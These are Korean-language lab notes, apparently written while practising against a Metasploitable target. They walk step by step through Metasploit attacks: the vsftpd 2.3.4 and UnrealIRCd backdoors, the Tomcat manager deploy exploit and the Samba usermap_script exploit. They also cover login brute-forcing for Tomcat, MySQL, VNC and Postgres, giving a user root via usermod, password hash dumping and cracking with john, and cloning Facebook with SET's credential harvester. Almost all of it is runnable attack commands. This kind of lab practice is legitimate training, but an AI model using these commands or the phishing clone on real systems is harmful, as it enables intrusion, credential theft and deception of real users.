[리눅스] [칼리 리눅스(KALI LINUX)]

# password 설정
sudo passwd

su

# 재부팅 허용 창이 나올경우 YES 클릭
apt-get update && apt-get upgrade -y

# 한글 폰트 설치
apt-get install -y fcitx-lib* 
apt-get install -y fcitx hangul* 
apt-get install -y fonts-nanum*

reboot

service postgresql start 

#db 초기화
msfdb init

 

msfconsole

msfconsole 입력.

# 해당 ip에서 사용하는 서비스 출력
nmap 192.168.108.134

# 해당 ip에서 사용하는 서비스 자세히 출력
nmap -sV 192.168.108.134

nmap -sV 192.168.108.134 입력. 

# msfadmin / msfadmin
ftp 192.168.108.134

cd /etc

# passwd 파일을 받을수 있는 취약점
get passwd

quit

msfconsole

search vsftpd
=> vsftpd 의 취약점 확인
== 아래와 같이나옴
   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution

 

 

==
use exploit/unix/ftp/vsftpd_234_backdoor

show options : 현재 공격 대상 상태

set RHOSTS 192.168.108.134 : 공격 대상 지정

show options : RHOSTS 들어간것 확인

exploit

ls -la :  공격 되는지 확인

usermod -u 0 -o msfadmin : -o 중복 허용 옵션 msfadmin 에게 root권한을 준다.

# msfadmin uid 0 인지 확인
cat /etc/passwd | grep msfadmin

계속 동작 서비스 확인하기 힘들기 때문에

nmap 결과를 텍스트 파일로 저장

nmap -sV 192.168.106.130 >> /home/nmap_result.txt

 

 

ex)

-- tomcat 로그인 탈취

msfconsole

use auxiliary/scanner/http/tomcat_mgr_login

set RHOSTS 192.168.106.130

set RPORT 8180

exploit

----------------------------------------

back <-- metasploit 에서 exit 바슷한 역활

-- deploy 기능을 이용한 공격 모듈을 사용하여 시스템 쉘을 획득하시오

use exploit/multi/http/tomcat_mgr_deploy

set HttpPassword tomcat

set HttpUsername tomcat

set RHOSTS 192.168.106.130

set RPORT 8180

exploit

----------------------------------------

-- samba - usermap_script

use exploit/multi/samba/usermap_script

set RHOSTS 192.168.106.130

exploit

-----------------------------------

-- 기본 쉘을 메타프린터 쉘로 업그레이드

세션을 연후 Ctrl + Z 를 눌러 나가면 세션이 유지된다.

sessions : 세션 확인 명령어

search meterpreter

use post/multi/manage/shell_to_meterpreter

set session 2

show options

run

sessions 3

-------------------------------

-- 비밀번호 탈취

use post/linux/gather/hashdump

set session 4 (메타프린터 쉘 선택)

exploit

Unshadowed Password File: /root/.msf4/loot/20200921214617_default_192.168.106.130_linux.hashes_404031.txt
=> 이곳에 패스워드 저장됨

mv /root/.msf4/loot/20200921214617_default_192.168.106.130_linux.hashes_404031.txt /home/password.txt

john /home/password.txt

-----------------

-- 세션 삭제

sessions -k 2

-----------------

-- mysql 공격

use auxiliary/scanner/mysql/mysql_login

set RHOSTS 192.168.0.212

exploit

mysql -h 192.168.0.212 -u root

-----------------

use auxiliary/scanner/mysql/mysql_schemadump

set RHOSTS 192.168.0.212

set PASSWORD root

set USERNAME root

run

-------------------

use auxiliary/scanner/mysql/mysql_hashdump

set RHOSTS 192.168.0.212

set USERNAME root

set PASSWORD root

------------------

-- vnc

use auxiliary/scanner/vnc/vnc_login

set RHOSTS 192.168.0.212

exploit

-- 위 vnc_login에서 얻은 password를 통해 vnc 접속
echo "password" | vncviewer 192.168.0.212 -autopass

------------------

-- irc

use exploit/unix/irc/unreal_ircd_3281_backdoor

set RHOSTS 192.168.0.212

exploit

------------------

postgres(databases) 서비스의 계정 비밀번호와 테이블 목록을 조회하라

use auxiliary/scanner/postgres/postgres_login 

set RHOSTS 192.168.0.212

exploit

psql -h 192.168.0.212 -U postgres

postgres / postgres

\list -- db 조회

\c postgres -- db(postgres) 지정

\dn 스키마 표시

\dt *.* -- 테이블 조회
SELECT * FROM pg_tables; 도가능

\! clear : \! 로 bash 명령어 실행할 수 있음

---------------------------------------

use auxiliary/scanner/postgres/postgres_hashdump

set RHOSTS 192.168.0.212

run

---
3175bce1d3201d16594cebf9d7eb3f9d
---

METASPLOITABLE


FAKESITE

-- 칼리 리눅스 터미널

-- 페이크 사이트 생성
setoolkit

y

-- Social-Engineering Attacks
1 

-- WebSite Attack Vectors
2

-- Credential Harvester Attack Method
3
--------------------------
새로운 터미널에서 apche2 시작 후 원래 터미널로 돌아감
Ctrl + Shift + T

service apache2 start
--------------------------

-- Site Cloner
2 

-- 자신의 IP
192.168.0.156

-- fake Target 사이트
http://www.facebook.com

y

웹사이트에서 자신의 IP 주소 접속

로그 파일 위치

rm ./.set/site-template

: << 'FAKESITE'